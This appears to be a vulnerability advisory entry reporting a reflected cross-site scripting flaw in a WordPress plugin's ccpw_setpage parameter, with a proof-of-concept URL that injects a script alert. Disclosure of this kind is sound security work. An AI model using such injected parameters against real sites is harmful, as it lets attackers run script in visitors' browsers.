The plugin does not sanitise and escape the ccpw_setpage parameter before outputting it back in pages where its shortcode is embed, leading to a Reflected Cross-Site Scripting issue
Append the following URL parameter on a page where the [ccpw_currencies_with_price] shortcode is embed: ccpw_setpage=1"><script>alert(/XSS/)</script> e.g: https://example.com/page_with_shortcode/?ccpw_setpage=1"><script>alert(/XSS/)</script>
Jeremie Amsellem
Jeremie Amsellem
Yes
2022-09-14 (about 1 years ago)
2022-09-14 (about 1 years ago)
2022-09-14 (about 1 years ago)